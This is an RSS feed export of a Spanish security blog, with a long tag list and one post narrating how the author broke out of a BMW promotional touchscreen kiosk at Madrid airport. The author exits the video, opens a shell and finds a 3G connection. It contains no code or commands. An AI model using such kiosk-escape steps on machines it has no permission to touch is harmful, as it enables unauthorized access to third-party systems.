<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-5399811056563385935</atom:id><lastBuildDate>Fri, 25 May 2012 13:26:22 +0000</lastBuildDate><category>flash</category><category>libertad de expresion</category><category>gpg</category><category>revista arroba</category><category>hotmail</category><category>administracion</category><category>logs</category><category>CansecWest</category><category>direct message</category><category>fabricantes</category><category>clicktale</category><category>malware 2.0</category><category>openvas</category><category>intypedia</category><category>opinión</category><category>documentación</category><category>foros</category><category>mclaren</category><category>pandora fms</category><category>proyectos de seguridad</category><category>inocentadas</category><category>extensiones</category><category>retos</category><category>vodafone</category><category>PKCS12</category><category>troyano</category><category>facebook</category><category>marcelo rivero</category><category>pki</category><category>java</category><category>GOBBLES</category><category>information gathering</category><category>sandboxie</category><category>Linksys</category><category>mariposa</category><category>legal</category><category>sitel</category><category>adolescentes</category><category>c</category><category>online</category><category>Siti/Aslan</category><category>curso</category><category>lacon</category><category>campus party EU</category><category>blacklists</category><category>auditoría</category><category>posts</category><category>white hat</category><category>ethernet exposed</category><category>pentest</category><category>sha-1</category><category>n64</category><category>reportes</category><category>iran</category><category>bloggers</category><category>nasa</category><category>biometría</category><category>análisis forense</category><category>rsa</category><category>tendencias</category><category>hacking</category><category>WASC</category><category>wargamecp2011</category><category>skynet</category><category>webcams</category><category>ios</category><category>wargamesbd2010</category><category>foca</category><category>famosos</category><category>gran hermano</category><category>prey</category><category>disco duro</category><category>iframe injection</category><category>monitorización</category><category>cumpleaños</category><category>cctv</category><category>troyanos</category><category>mira que dia es hoy</category><category>rae</category><category>hack</category><category>just-for-fun</category><category>cookies</category><category>fail-close</category><category>aplicaciones</category><category>KGB</category><category>información</category><category>unix</category><category>reyes magos</category><category>contacto</category><category>compras</category><category>credenciales</category><category>conectacon</category><category>bmw</category><category>grsecurity</category><category>vpns</category><category>master</category><category>puertas traseras</category><category>consultas</category><category>SPF</category><category>ironbee</category><category>gestión</category><category>nids</category><category>AOL</category><category>ciberseguridad</category><category>mesa redonda</category><category>ADSL</category><category>tails</category><category>SAI</category><category>gratis</category><category>cibercrimen</category><category>contraseñas robustas</category><category>vulnerabilidad</category><category>HTTP</category><category>antonio ortiz</category><category>syn flood</category><category>windows xp</category><category>pinsafe</category><category>rack</category><category>web 2.0</category><category>grupo</category><category>dradis</category><category>emiratos arabes</category><category>chuleta</category><category>pauldotcom</category><category>diseño</category><category>winunhide</category><category>swine flu</category><category>servicios sbd</category><category>ocu</category><category>madrid 2016</category><category>dm</category><category>fibra</category><category>digg.com</category><category>magirus</category><category>comodo</category><category>sameips</category><category>espias</category><category>gui</category><category>scan</category><category>permisos</category><category>WEP</category><category>wargamecp2010</category><category>android</category><category>amispammer</category><category>DISI</category><category>software</category><category>ids</category><category>estrategia</category><category>vaulting</category><category>market</category><category>security low cost</category><category>dropbox</category><category>gallir</category><category>navegador</category><category>scam</category><category>itunes</category><category>Localización</category><category>módulos</category><category>DDoS</category><category>recuperación</category><category>Jeffery Deaver</category><category>skype</category><category>comparativa</category><category>spoofing</category><category>2012</category><category>vsftpd</category><category>ffhardener</category><category>prioridades</category><category>tecnología</category><category>windows</category><category>otp</category><category>pin</category><category>oauth</category><category>backdoors</category><category>timestamp</category><category>bypass</category><category>Yahoo</category><category>revista</category><category>lg</category><category>criptografía</category><category>ikee</category><category>write once own everyone</category><category>videos</category><category>espías</category><category>2010</category><category>full path disclosure</category><category>ataques fuerza bruta</category><category>autenticación fuerte</category><category>samsung</category><category>moviles</category><category>Kevin Mitnick</category><category>source</category><category>colaboraciones</category><category>gripe</category><category>bluetooth</category><category>captcha</category><category>consolidación</category><category>voiceguard</category><category>plugins seguridad</category><category>fail-open</category><category>anonimizador</category><category>microsoft security essentials</category><category>dnsbl</category><category>cine</category><category>uca</category><category>iptables</category><category>netcat</category><category>notificación</category><category>sgae</category><category>fia</category><category>dlp</category><category>vacaciones</category><category>bugs</category><category>bouncer</category><category>infospyware</category><category>cyber warriors</category><category>ezines</category><category>convergence</category><category>recortes</category><category>reportajes</category><category>routers</category><category>vigilancia</category><category>chrome</category><category>geoips</category><category>mobileme</category><category>backtrack</category><category>cracking</category><category>medios de prensa</category><category>concurso</category><category>la estancia azul</category><category>física</category><category>security industry</category><category>camstudio</category><category>negocio</category><category>predicciones</category><category>documental</category><category>test app web</category><category>xss</category><category>hvac</category><category>clifford stoll</category><category>doping</category><category>reversing</category><category>gdt</category><category>botnets</category><category>keylogging</category><category>magia</category><category>ceh</category><category>aniversario</category><category>autenticación</category><category>ctf</category><category>donaciones</category><category>wordpress</category><category>chile</category><category>ikea</category><category>dns</category><category>opinion</category><category>drm</category><category>patentes</category><category>clamav</category><category>servicio</category><category>dan Kaminsky</category><category>shon harris</category><category>Telefonica</category><category>pci-dss</category><category>firesheep</category><category>consecuencias</category><category>red neutral</category><category>ISO</category><category>ebay</category><category>perl</category><category>sony</category><category>Anonymous</category><category>cifrado</category><category>roomba</category><category>3g</category><category>ISP</category><category>pgp</category><category>troyanos bancarios</category><category>steve jobs</category><category>zaragoza</category><category>correo</category><category>rootedlabs</category><category>dispositivos portátiles</category><category>riesgos</category><category>securización</category><category>pax</category><category>seguridad negativa</category><category>cloud computing</category><category>antispam</category><category>lulzsec</category><category>confidencialidad</category><category>quiz</category><category>mitigación</category><category>client-side</category><category>UPM</category><category>tuvpn</category><category>bigbrother</category><category>jynx</category><category>hardening</category><category>wicho</category><category>comtrend</category><category>kernel</category><category>huevo del cuco</category><category>att</category><category>cheatsheet</category><category>mod_security</category><category>hsm</category><category>curriculum</category><category>dron</category><category>inhibidores</category><category>seguridad</category><category>acortadores</category><category>ccc</category><category>fnmt</category><category>robo</category><category>SQL injection</category><category>OpenVPN</category><category>UTM</category><category>home</category><category>TEMPEST</category><category>firefox</category><category>cisco</category><category>iphone</category><category>tutoriales</category><category>daltonismo</category><category>802.11n</category><category>pic</category><category>phrack</category><category>ciberguerra</category><category>expresiones</category><category>blogs</category><category>atómica</category><category>ecología</category><category>formacion</category><category>kriptopolis</category><category>WPA</category><category>vmware</category><category>security</category><category>Pirate Bay</category><category>elf</category><category>esteganografia</category><category>metasploit express</category><category>sgsi</category><category>gsm</category><category>meneame</category><category>robots</category><category>sincronización</category><category>kingston</category><category>pwnie awards</category><category>mod_ssl</category><category>optimizacion</category><category>slowloris</category><category>programación</category><category>ghostbuster</category><category>exploits</category><category>Keystrokes sniffing</category><category>trustwave</category><category>sorteo</category><category>microsiervos</category><category>utilidades</category><category>osstmm</category><category>GPS</category><category>art of deception</category><category>china</category><category>samurai</category><category>cuántica</category><category>campus party 2009</category><category>owned</category><category>cursos</category><category>estudio</category><category>tuenti</category><category>bitdefender</category><category>encuesta</category><category>bgp</category><category>integria ims</category><category>ryanfail</category><category>apple</category><category>CISSP</category><category>kaspersky</category><category>ipad</category><category>seguridad perimetral</category><category>pentbox</category><category>mayorista</category><category>congresos</category><category>cms</category><category>spim</category><category>resumen</category><category>thunderbird</category><category>bad heroes</category><category>Threat Assessment</category><category>alarma</category><category>securitas</category><category>breach</category><category>920</category><category>syslog</category><category>parcheado</category><category>backups</category><category>ARP Spoofing</category><category>metadatos</category><category>correlación</category><category>paquetes</category><category>comprometido</category><category>defaces</category><category>matrix</category><category>cuadro de mandos</category><category>empresas</category><category>Extended Validation Certificate</category><category>algo inutil</category><category>recargamasmovil.net</category><category>series</category><category>libertades</category><category>elecciones EEUU</category><category>navidad</category><category>kioskos virtuales</category><category>configuración</category><category>enise</category><category>administrador de redes</category><category>software seguro</category><category>cookie hijacking</category><category>una al dia</category><category>adobe</category><category>bios</category><category>wpa2</category><category>arquitectura</category><category>CAs</category><category>VPN</category><category>tweetme</category><category>vulnerable</category><category>Mr Bean</category><category>rdp</category><category>keylogger</category><category>dep</category><category>televisión</category><category>Mac OS X</category><category>email</category><category>mundo hacker tv</category><category>conficker</category><category>secmana</category><category>aeropuertos</category><category>rootkits</category><category>halloween</category><category>attack</category><category>google voice</category><category>forospyware</category><category>wifi</category><category>talleres</category><category>unhide</category><category>campus party 2010</category><category>HPP</category><category>apt</category><category>patriot-NG</category><category>metasploit</category><category>hackeos memorables</category><category>hotspot hijacking</category><category>espionaje</category><category>rogue antivirus</category><category>seguridad web</category><category>radiography</category><category>securitybydefault</category><category>modas</category><category>netsparker</category><category>peepdf</category><category>Salma Hayek</category><category>censura</category><category>encfs</category><category>campus party 2011</category><category>WAF</category><category>protección de datos</category><category>google</category><category>trabajo</category><category>podcast</category><category>cortafuegos</category><category>Trendmicro</category><category>fusiones</category><category>geolocalización</category><category>kernel.org</category><category>poisoning</category><category>opensource</category><category>XTM</category><category>hispasec</category><category>clickjacking</category><category>fraude</category><category>shodan</category><category>cydia</category><category>redes</category><category>scripts</category><category>banca online</category><category>recomendable</category><category>World Wild Web Conference</category><category>defensa</category><category>usb</category><category>howto</category><category>penal</category><category>networkingactivo</category><category>ssh</category><category>normativas</category><category>ciberterrorismo</category><category>e-passaporte</category><category>joanna rutkowska</category><category>honeytokens</category><category>recopilación</category><category>charlas</category><category>phishing</category><category>sbd.bot</category><category>cumplimiento</category><category>twitter</category><category>seguridad física</category><category>virus</category><category>wargamecp2009</category><category>28c3</category><category>gmail</category><category>foursquare</category><category>pandora</category><category>sbd</category><category>ataques</category><category>web</category><category>gadgets</category><category>integridad</category><category>contraseñas</category><category>bitlocker</category><category>nirsoft</category><category>Wozniak</category><category>windows 7</category><category>alvy</category><category>evolución</category><category>libros</category><category>pedofilia</category><category>IP</category><category>top</category><category>contribuciones</category><category>bancos</category><category>mcafee</category><category>ciphertwitter</category><category>sniffing</category><category>fortificación</category><category>cfp</category><category>wikileaks</category><category>mysql</category><category>IPS</category><category>tracking</category><category>sourceforge</category><category>LHC</category><category>rovio</category><category>incidentes</category><category>ncn2k11</category><category>modelos</category><category>openssl</category><category>floyd landis</category><category>TOR</category><category>forensic</category><category>tume</category><category>privacidad</category><category>cardsharing</category><category>A5/1</category><category>móviles</category><category>ssl</category><category>bitacoras.com</category><category>ncn2k10</category><category>pendrives</category><category>exploit</category><category>folklorica</category><category>mailsellado</category><category>csrf</category><category>MSE</category><category>tarjetas de crédito</category><category>honeypots</category><category>Gary McKinnon</category><category>whatsapp</category><category>desafíos</category><category>PSP</category><category>politica</category><category>UCM</category><category>phpids</category><category>youtube</category><category>pp</category><category>colombia</category><category>blackhat09eu</category><category>irán</category><category>sebek</category><category>tour de francia</category><category>int3pids</category><category>phpbb</category><category>spammers</category><category>owasp</category><category>underground</category><category>guardia civil</category><category>codigo fuente</category><category>ciberataque</category><category>coches</category><category>session hijacking</category><category>ingenieria social</category><category>blackhat10eu</category><category>dshield</category><category>CERT</category><category>reversing malware tales</category><category>opensamm</category><category>traduccion</category><category>don't be evil</category><category>php</category><category>internet explorer</category><category>nmap</category><category>ncrack</category><category>cardspace</category><category>nessus</category><category>WorldWide DNS</category><category>nas</category><category>mensajeria</category><category>sslcop</category><category>antivirus</category><category>blogger</category><category>certificaciones</category><category>sid</category><category>buscadores</category><category>noticias</category><category>dama</category><category>Wally</category><category>concienciacion</category><category>eventos</category><category>movistar</category><category>actualidad</category><category>uem</category><category>profesiones</category><category>oido</category><category>distribuciones</category><category>seguridad positiva</category><category>operadoras</category><category>sms</category><category>gentoo</category><category>smime</category><category>hashes</category><category>antirrobo</category><category>malware</category><category>Saas</category><category>whisper systems</category><category>robot</category><category>GreenSQL</category><category>tsa</category><category>domótica</category><category>telecinco</category><category>ferrari</category><category>egm</category><category>rootkit.com</category><category>publicaciones</category><category>buzz</category><category>redhat</category><category>2wire</category><category>antiforense</category><category>hids</category><category>spam</category><category>sistemas operativos</category><category>cámaras</category><category>oscuridad</category><category>swivel</category><category>FRHACK</category><category>iis</category><category>ps3</category><category>faq</category><category>inyección</category><category>moxie</category><category>ley sinde</category><category>estafa</category><category>pdf</category><category>navegación segura</category><category>conectividad</category><category>gpu</category><category>asterisk</category><category>Europa</category><category>elecciones Europeas</category><category>phising</category><category>juniper</category><category>HTTP Parameter Pollution</category><category>epic</category><category>framework</category><category>Rumania</category><category>rapid7</category><category>sesión</category><category>crypto</category><category>falsos positivos</category><category>firmado digital</category><category>passport</category><category>selinux</category><category>navegadores</category><category>0day</category><category>insiders</category><category>WWW2009</category><category>inversiones</category><category>worms</category><category>tomcat</category><category>2FA</category><category>fenomeno extraño</category><category>inteco</category><category>buenas prácticas</category><category>Security Blogger Summit</category><category>no somos dignos</category><category>ilegal</category><category>spyware</category><category>fiebre porcina</category><category>irc</category><category>supersticiones</category><category>LOPD</category><category>firewall</category><category>livecd</category><category>aslr</category><category>hardware</category><category>wgsbd2</category><category>router</category><category>tweetdeck</category><category>subseven</category><category>vhoster</category><category>entrevistas</category><category>firma digital</category><category>novell</category><category>renaud bidou</category><category>Cloud Antivirus</category><category>alguiens</category><category>hackers</category><category>sans</category><category>sara</category><category>seo</category><category>teletrabajo</category><category>historia</category><category>QRCode</category><category>blackberry</category><category>fugas informacion</category><category>qubes</category><category>pantallas táctiles</category><category>wireless</category><category>enrique dans</category><category>disclosure</category><category>blogoff</category><category>md5</category><category>criptografia</category><category>ipv6</category><category>dialers</category><category>show</category><category>khobe</category><category>buenas practicas</category><category>covert-channel</category><category>fingerprint</category><category>tagged</category><category>tony blair</category><category>analisis de vulnerabilidades</category><category>ollydbg</category><category>redes sociales</category><category>rooted2012</category><category>pppoe</category><category>challenges</category><category>hostspots</category><category>ACK</category><category>gatovolador</category><category>nesus</category><category>informes</category><category>enred20</category><category>lecturas</category><category>conferencias</category><category>humor</category><category>capturas</category><category>fundacion autor</category><category>fernando tellado</category><category>dni electronico</category><category>geek</category><category>bash</category><category>troyanos titiriteros</category><category>oracle</category><category>opfacebook</category><category>tabletas</category><category>posix</category><category>defcon</category><category>videojuegos</category><category>formación</category><category>proxy</category><category>asegurait</category><category>pastebin</category><category>honeynet</category><category>joomla</category><category>passwords</category><category>gtalk</category><category>phreaking</category><category>elección</category><category>e-crime</category><category>trucos</category><category>barcelona</category><category>msn</category><category>mutex</category><category>internet</category><category>debian</category><category>wargame</category><category>escenas graciosas</category><category>dos</category><category>telefonía</category><category>machismo</category><category>apache</category><category>linux</category><category>insecure by default</category><category>wardialing</category><category>pfm</category><category>voip</category><category>palo alto</category><category>applets</category><category>certificados digitales</category><category>openripple</category><category>emet</category><category>reconocimiento</category><category>bitacoras</category><category>rooted2010</category><category>herramientas</category><category>mujeres</category><category>egeda</category><category>metricas de seguridad</category><category>david bravo</category><category>Panda Security</category><category>activex</category><category>dreambox</category><category>novedades</category><category>drupal</category><category>microsoft</category><category>rootedcon</category><category>comercio electronico</category><category>rooted2011</category><category>alertas</category><category>fail</category><category>teclado virtual</category><category>identidad</category><category>blackhat09usa</category><title>Security By Default</title><description /><link>http://www.securitybydefault.com/</link><managingEditor>noreply@blogger.com (Yago Jesus)</managingEditor><generator>Blogger</generator><openSearch:totalResults>1390</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SecurityByDefault" /><feedburner:info uri="securitybydefault" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>SecurityByDefault</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-5133421323606163793</guid><pubDate>Fri, 25 May 2012 04:32:00 +0000</pubDate><atom:updated>2012-05-25T06:32:00.177+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">pantallas táctiles</category><category domain="http://www.blogger.com/atom/ns#">bmw</category><title>BMW ¿Te gusta conducir?</title><description>&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-VDA3eSHFBJY/T7kTH9yERrI/AAAAAAAAA08/y2BnbuWxSmU/s1600/bmw_portada.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="http://1.bp.blogspot.com/-VDA3eSHFBJY/T7kTH9yERrI/AAAAAAAAA08/y2BnbuWxSmU/s400/bmw_portada.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
La historia que cuento hoy tuvo lugar el 24 de Marzo en la Terminal 4 del aeropuerto de Barajas en Madrid. Ese día me disponía a emprender un largo y pesado viaje a Bogotá, a lo que resultó en una enriquecedora experiencia: &lt;a href="http://www.securitybydefault.com/2012/04/mi-experiencia-personal-en-ack-security.html"&gt;el ACK Security Conference&lt;/a&gt;. Sin embargo, cuando me dirigía a buscar el tren que me llevara a la Terminal 4 Satélite, una preciosidad me frenó en seco. No, no era ninguna chica,… sino la máquina que véis expuesta en la siguiente foto.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-C-SDaZPaGzc/T7kTh4P3YMI/AAAAAAAAA1E/zpWl3535oXs/s1600/IMG_2664.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://1.bp.blogspot.com/-C-SDaZPaGzc/T7kTh4P3YMI/AAAAAAAAA1E/zpWl3535oXs/s400/IMG_2664.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Después de ver bien el coche, acompañado por un montón de gente a mi alrededor, me fijo que a mi espalda estaba el típico expositor que suele mostrar una película con la campaña publicitaria del coche. Como tenía tiempo, quise echar un vistazo para ver esta joya en movimiento, aunque no sea en vivo. Mi sorpresa fue aún mayor cuando veo la pantalla:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-LgjaSzaOefU/T7kT4Lu3CDI/AAAAAAAAA1M/Wlwowx_NRmo/s1600/IMG_2650.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://1.bp.blogspot.com/-LgjaSzaOefU/T7kT4Lu3CDI/AAAAAAAAA1M/Wlwowx_NRmo/s400/IMG_2650.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Lo primero que pensé fue: Mira que bien, un regalito para los chicos de &lt;a href="http://www.flu-project.com/"&gt;Flu Project&lt;/a&gt; en modo de "&lt;a href="http://www.flu-project.com/tag/pantalla-publica"&gt;Pantalla pública&lt;/a&gt;". Sin embargo después me vino a la cabeza, ver qué recursos tenía disponibles para hacer alguna otra "maldad" :)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Se nota que la crisis ha llegado hasta el departamento de márketing de BMW, que no tiene fondos para pagar sus copias originales de Windows… o al menos no se han preocupado de hacer la correspondiente validación.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-m8Ry_TEosuk/T7kUYdeoXuI/AAAAAAAAA1U/WwGqqUdWf20/s1600/IMG_2651.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://1.bp.blogspot.com/-m8Ry_TEosuk/T7kUYdeoXuI/AAAAAAAAA1U/WwGqqUdWf20/s400/IMG_2651.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La gente de BMW dejó a gusto del usuario que "hubiese o no película" para ver. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-mB_oiqXFdeg/T7kVPWJsq1I/AAAAAAAAA1c/c3_8-M9Bwlo/s1600/IMG_2652.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-mB_oiqXFdeg/T7kVPWJsq1I/AAAAAAAAA1c/c3_8-M9Bwlo/s400/IMG_2652.jpg" width="298" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como tenía gente por todas partes y vaya usted a saber cuántas cámaras me apuntaban, decidí verla un rato para evitar las sospechas:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ar2xUB9ZlO0/T7kWWAxf84I/AAAAAAAAA1k/TnXYI4-yV10/s1600/IMG_2653.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://3.bp.blogspot.com/-ar2xUB9ZlO0/T7kWWAxf84I/AAAAAAAAA1k/TnXYI4-yV10/s400/IMG_2653.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Bueno, veamos qué más se puede hacer con una pantalla táctil sin teclado… un ipad de taitantas pulgadas. Menos mal que estos chicos de Windows pensaron en lo del teclado virtual desde hace tiempo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-mqBqx630oXM/T7kWyIa9s9I/AAAAAAAAA1s/RHC7Tk9hQEw/s1600/IMG_2654.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://2.bp.blogspot.com/-mqBqx630oXM/T7kWyIa9s9I/AAAAAAAAA1s/RHC7Tk9hQEw/s400/IMG_2654.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Pensé que la foto de &lt;a href="http://tinyurl.com/AtaqueDavidHasselhoff"&gt;David Hasselhoff&lt;/a&gt; en una pantalla así de grande, tenía que verse cuanto menos divertida. Veamos si hay acceso a Google de momento.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-4YdmKhpOT-M/T7kW4AqYPjI/AAAAAAAAA10/uhMhFSOcF9c/s1600/IMG_2655.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="239" src="http://4.bp.blogspot.com/-4YdmKhpOT-M/T7kW4AqYPjI/AAAAAAAAA10/uhMhFSOcF9c/s320/IMG_2655.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-5yc9Lugh3ZA/T7kW_WEI79I/AAAAAAAAA18/vuynhgg-0HE/s1600/IMG_2656.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;&amp;nbsp;Vaya,… la máquina no tiene conexión a Internet de momento.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-5yc9Lugh3ZA/T7kW_WEI79I/AAAAAAAAA18/vuynhgg-0HE/s1600/IMG_2656.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://2.bp.blogspot.com/-5yc9Lugh3ZA/T7kW_WEI79I/AAAAAAAAA18/vuynhgg-0HE/s400/IMG_2656.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;¿Tendremos la suerte de estar conectados a alguna red del propio aeropuerto? Buscamos una shell y….&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-c3TIom5q58o/T7kXD6F3GeI/AAAAAAAAA2E/Qvdz77tcVP0/s1600/IMG_2657.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://1.bp.blogspot.com/-c3TIom5q58o/T7kXD6F3GeI/AAAAAAAAA2E/Qvdz77tcVP0/s400/IMG_2657.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Mira que bien, con usuario BMW y todo… Busquemos red:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-P-e9SvOodIM/T7kXKJwpstI/AAAAAAAAA2M/crTz1M6zdaE/s1600/IMG_2658.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://3.bp.blogspot.com/-P-e9SvOodIM/T7kXKJwpstI/AAAAAAAAA2M/crTz1M6zdaE/s400/IMG_2658.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Vaya,… parece que estamos en un ordenador aislado, sin red local, aunque,… oh wait! "Vodafone Mobile Broadband"??? Eso quiere decir que tiene una conexión USB 3G en algún sitio. Normal, porque de alguna forma el expositor, que ahora mismo no está aquí, tendrá que leerse el periódico y actualizar su Facebook y Twitter no? Eso quiere decir que en alguna parte, tiene que haber un iconito que…&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-_9O_168GtpA/T7kXWFCbZlI/AAAAAAAAA2U/pRLkkwJ_rJE/s1600/IMG_2659.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://2.bp.blogspot.com/-_9O_168GtpA/T7kXWFCbZlI/AAAAAAAAA2U/pRLkkwJ_rJE/s400/IMG_2659.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Tacháaaan!&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ObvjmpGCrpI/T7kXch-7LII/AAAAAAAAA2c/9mWbQhduzxg/s1600/IMG_2660.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://3.bp.blogspot.com/-ObvjmpGCrpI/T7kXch-7LII/AAAAAAAAA2c/9mWbQhduzxg/s400/IMG_2660.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Parece que estamos a un click…&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-hYSFDRfKrc4/T7kXi6olaeI/AAAAAAAAA2k/rUUYU1DFSYU/s1600/IMG_2661.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://2.bp.blogspot.com/-hYSFDRfKrc4/T7kXi6olaeI/AAAAAAAAA2k/rUUYU1DFSYU/s400/IMG_2661.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Y sin embargo,…&lt;/div&gt;&lt;br /&gt;
